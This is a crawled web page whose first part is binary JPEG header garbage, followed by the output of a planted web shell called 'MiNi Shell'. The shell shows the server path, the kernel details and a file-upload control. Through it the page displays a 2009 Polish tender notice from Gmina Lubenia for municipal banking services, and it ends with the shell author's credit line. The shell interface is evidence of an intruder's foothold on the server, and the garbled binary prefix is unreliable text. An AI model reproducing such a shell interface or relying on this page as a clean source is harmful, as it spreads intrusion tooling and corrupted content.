JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/342302-N-2009.html

<p class="kh_header"><b>Lubenia: Obsługa bankowa budżetu Gminy Lubenia oraz jednostek finansowanych przez ten budżet w latach 2009-2013</b><br>
<b>Numer ogłoszenia: 342302 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubenia , Lubenia 131, 36-042 Lubenia, woj. podkarpackie, tel. 017 8503914, 8755096, faks 017 8755099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lubenia.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy Lubenia oraz jednostek finansowanych przez ten budżet w latach 2009-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa bankowa polegająca na:
Obsłudze rachunków bieżących, pomocniczych i  wyodrębnionych gminy oraz jednostek organizacyjnych: Urząd Gminy Lubenia, Szkoła Podstawowa w Lubeni, Szkoła Podstawowa w Straszydlu, Gimnazjum Publiczne w Siedliskach, Zespół Ekonomiczno - Administracyjny Szkół w Lubeni, Gminny Ośrodek Pomocy Społecznej.
Prowadzeniu konta: funduszu świadczeń socjalnych,  depozytowego dla budżetu gminy, Gminnego Funduszu Ochrony Środowiska i Gospodarki Wodnej,
Instalacji systemu home banking w 3 jednostkach organizacyjnych  po jednym stanowisku - system musi umożliwiać obserwację drogą elektroniczną systemu kont prowadzonych przez Urząd Gminy i jednostki organizacyjne gminy .
4.. W ramach obsługi bankowej  gminy oraz jednostek organizacyjnych gminy Wykonawca zapewni: otwarcie i prowadzenie rachunków bieżących,  pomocniczych i wyodrębnionych w złotych polskich ; wpłaty i wypłaty gotówkowe; administrowanie rachunkami; automatyczne inwestowanie środków; przelewy środków na rachunki w innych bankach; dostarczanie wyciągów bankowych w formie elektronicznej i papierowej wraz załączonymi dowodami księgowymi ; prowadzenie na zlecenie Zamawiającego rachunków wyodrębnionych pozwalających na gromadzenie środków przeznaczonych na określony cel oraz prowadzenie w tym zakresie rozliczeń pieniężnych; oprocentowanie środków pieniężnych na wszystkich obsługiwanych rachunkach, bądź odstąpienie od oprocentowana rachunku zgodnie z dyspozycją Zamawiającego; możliwość realizacji zleceń płatniczych w systemie elektronicznym na wszystkich rachunkach  w szczególności: informacje o operacjach i saldzie, składanie poleceń przelewu, dokonywanie lokat, przeglądanie historii operacji na rachunkach Zamawiającego; wdrożenie elektronicznego systemu w zakresie realizacji zleceń płatniczych (instalacja oprogramowania, przeszkolenie pracowników Zamawiającego bez dodatkowych opłat); możliwość uruchomienia przez Zamawiającego kredytu obrotowego na rachunku bieżącym na pokrycie przejściowego niedoboru budżetowego do wysokości uchwalonej przez Radę Gminy Lubenia na każdy rok budżetowy i spłacanego do końca roku budżetowego (kalendarzowego), pobieranego w wypadku zapotrzebowania; dokonywanie rozliczeń pieniężnych w zakresie wpłat i wypłat za pośrednictwem czeków gotówkowych; założenie i prowadzenie rachunków - bez dodatkowych opłat; dokonywanie wypłat gotówkowych z rachunku Zamawiającego na rzecz osób trzecich; dokonywanie rozliczeń bezgotówkowych za pomocą pleceń przelewu oraz czeków rozrachunkowych; przyjęcie warunku, że czas transferu środków finansowych  będzie się odbywać w systemie ELIKSIR w ciągu jednego dnia; prowadzenie wszystkich rachunków gminy i jednostek organizacyjnych na jednakowych warunkach; możliwość wykorzystania wpływów bieżących do realizacji zleceń płatniczych; dokonywanie przelewów w obrębie banku bez dodatkowych opłat; w przypadku utworzenia nowych jednostek organizacyjnych Gminy system i wysokość opłat będzie określony na zasadach ogólnych jak dla budżetu Gminy.

W ramach obsługi bankowej  gminy oraz jednostek organizacyjnych gminy Wykonawca zagwarantuje:  możliwość umieszczania wolnych środków pieniężnych na lokatach długo i krótkoterminowych; prowadzenie usługi typu home - banking na trzech stanowiskach  komputerowych umożliwiającą dokonywanie przelewów oraz uzyskiwanie informacji o stanie rachunku bankowego; prowadzenie doradztwa finansowego i wydawania opinii z zakresu: pozyskiwania środków bezzwrotnych pochodzących z funduszy Unii Europejskiej, pozyskiwania kredytów preferencyjnych,  lokowania wolnych środków

Obsługa klientów Gminnego Ośrodka Pomocy Społecznej i ZEAS w siedzibie banku /lub pomieszczeniu do którego bank posiada tytuł prawny/ na terenie Lubeni. Obsługa  odbywać się będzie w dni robocze od poniedziałku do piątku w godz. 8.00-.15.00.; Zamawiający zastrzega sobie, by w sytuacji gdy bank nie posiada siedziby na terenie wsi Lubenia zapewnił wydzielone pomieszczenie z okienkiem kasowym, w którym będzie możliwe oczekiwanie w kolejce kilkunastu osób. W pomieszczeniu  tym powinny znajdować się ławki lub inne urządzenia umożliwiające oczekiwanie osobom starszym i niedołężnym; Zamawiający zastrzega sobie możliwość dostarczania na żądanie gotówki do kasy w UG Lubenia .

Zapewnienie doradztwa finansowego i kapitałowego polegającego w szczególności na: przekazywaniu wolnych środków na oprocentowane lokaty terminowe; pozyskiwanie kredytów preferencyjnych bezpośrednio w siedzibie banku; bieżącym informowaniu o aktualnej ofercie produktowej banku; pomocy w doborze odpowiednich produktów i usług bankowych w celu optymalizacji wykorzystania i zagospodarowania środków finansowych jednostek; reagowaniu na bieżące potrzeby Zamawiającego; możliwości uzyskania na wniosek Zamawiającego gwarancji bankowej.

Zamawiajmy zastrzega sobie, że : przyjmowanie wpłat na rachunki podstawowe będzie się odbywało bez dodatkowych opłat; wysokość opłaty za realizację zleceń płatniczych składanych  za pośrednictwem drogi elektronicznej i w formie papierowej na rachunki prowadzone w innych bankach nie będzie wyższa niż 0,50zł za przelew, a  wysokość opłaty za realizację zleceń płatniczych składanych  za pośrednictwem drogi elektronicznej i w formie papierowej w sieci  banku Zamawiającego bez pobierania opłaty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Spełniający warunki art. 22 ust. 1 ustawy Prawo Zamówień Publicznych z dnia 
29 stycznia 2004 (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) w tym posiadający uprawnienia do wykonywania określonej działalności będącej przedmiotem  zamówienia jeżeli ustawy nakładają obowiązek posiadania takich uprawnień tj. posiadają uprawnienia do wykonywania działalności bankowej 
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia . 
3.dysponują lub będą dysponować i wskażą do realizacji niniejszego zamówienia osoby zdolne do wykonania zamówienia legitymujące się kwalifikacjami odpowiednimi do stanowisk, jakie zostaną tym osobom powierzone. 
4.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli: Wykonawca wykaże, że posiada współczynnik wypłacalności banku jest nie mniejszy niż 8 % na podstawie ustawy z dnia 29.08.1997 r. - Prawo bankowe art. 128 ust. 1, pkt 3 (Dz. U. z 2002 r. Nr 77 poz 665 z późn. zm.).
5.Nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
Z postępowania o udzielenie zamówienia wyklucza się :
1).	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2).	 wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3).	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
4).	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5).	 spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6).	 spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7).	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8).	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9).	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10).	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy pzp.
Z postępowania wyklucza się również Wykonawców, którzy:
11).	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
12).	 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
13).	 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy pzp;
14).	 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
6.W przypadku składania oferty wspólnej Wykonawcy muszą wykazać, że :
a)	Warunek określony w punkcie 1 i  5 spełnia  każdy z Wykonawców
b)	Warunek określony w punkcie 2, 4. spełniają łącznie wszyscy Wykonawcy.
c)	Warunek określony w punkcie 3. spełnia co najmniej jeden z Wykonawców występujących wspólnie.
7.Ocena spełniania warunków zostanie dokonana na podstawie załączonych do oferty przez Wykonawcę dokumentów określonych przez Zamawiającego w S.I.W.Z. Ocena będzie dokonana metodą  wyboru spełnia /nie spełnia , na podstawie dostarczonych dokumentów i oświadczeń. 
8..W przypadku składania oferty wspólnej :
Wkonawcy występujący wspólnie muszą upoważnić jednego spośród siebie jako przedstawiciela pozostałych  - lidera do zaciągania zobowiązań i rozporządzania prawem w sprawach związanych z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych Wykonawców lub ich upoważnionych przedstawicieli.
Pełnomocnictwo winno spełniać wymogi określone w art. 61 oraz 98 i następnych Kodeksu Cywilnego (Dz. U. 1964 nr 16 poz. 93 z późn. zm.).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustaw z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) Zamawiający żąda następujące dokumentów :
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert;
- zezwolenie właściwego organu na rozpoczęcie przez Wykonawcę działalności objętej przedmiotem zamówienia tj. zezwolenie na utworzenie banku  i wykonywanie czynności bankowych 


Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć dokumenty wymagane w pkt. 6.1 SIWZ dotyczące wszystkich wykonawców ubiegających się o udzielenie zamówienia.

Uwaga: Jeżeli ofertę i załączone do niej dokumenty podpisują osoby nieujawnione w rejestrze lub ewidencji, do oferty należy dołączyć stosowne pełnomocnictwa udzielone przez osobę/osoby ujawnioną/e/ w rejestrze lub ewidencji. Pełnomocnictwo winno spełniać wymogi określone w art. 61 oraz 98 i następnych Kodeksu Cywilnego (Dz. U. 1964 nr 16 poz. 93 z późn. zm.)
2.W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia i oraz potwierdzenia warunku, że nie podlega wykluczeniu, Zamawiający żąda następujących dokumentów:

- Oświadczenie o spełnieniu warunków udziału w postępowaniu i nie podleganiu wykluczeniu z postępowania zgodnie z ustawą Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn.zm.).

3..W celu potwierdzenia warunku że Wykonawca znajduje się w sytuacji ekonomicznej zapewniającej wykonanie zamówienia 
- dokument potwierdzający, że aktualny wskaźnik wypłacalności banku jest nie mniejszy niż 8 % na podstawie ustawy z dnia 29.08.1997 r. - Prawo bankowe art. 128 ust. 1, pkt 3 (Dz. U. z 2002 r. Nr 77 poz 665 z późn. zm.).
4.Wykaz dokumentów zastrzeżonych jako tajne jeżeli  takie stanowią część oferty. Objęte powyższym zastrzeżeniem dokumenty stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie. 


Uwaga: Stosownie do art. 8 ust. 3 ustawy Prawo Zamówień Publicznych Wykonawca może zastrzec nie później niż w terminie składania ofert, które ze złożonych informacji stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 cytowanej ustawy.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt. 1  stosownie do treści § 2 Rozporządzenia  Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605) w sprawie rodzaju dokumentów, jakich może żądać  zamawiający od  Wykonawcy , oraz form w jakich te dokumenty mogą być składane i Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniające rozporządzenie w sprawie rodzaju dokumentów, jakich może żądać  zamawiający od  Wykonawcy , oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 188 , poz. 1155) składa dokument lub dokumenty wystawione w kraju , w którym ma siedzibę lub miejsce zamieszkania potwierdzające  odpowiednio, że :  nie otwarto likwidacji ani nie ogłoszono upadłości. Dokument  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert. 
 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu , o którym mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przez notariuszem, właściwym organem sądowym, administracyjnym albo właściwym organem samorządu zawodowego lub gospodarczego  odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania. 
Dokumenty wymagane dla potwierdzenia spełniania przez Wykonawców warunków udziału w postępowaniu są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz tłumaczeniem na język polski poświadczonym przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 56</li>
<li>2 - prowizje - 40</li>
<li>3 - oprocentowanie środków finansowych - 4</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lubenia.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - Urząd Gminy Lubenia,  Lubenia 131, 36-042 Lubenia ,  pok. Nr 16 ,w godz.  od 8 00 - 15 00 od poniedziałku do piątku, Cena Specyfikacji Istotnych Warunków Zamówienia-100,00 ZŁ.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2009 godzina 09:00, miejsce: Siedziba Zamawiającego - Urząd Gminy Lubenia, Lubenia 131, 36-042 Lubenia, pok. Nr 2 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com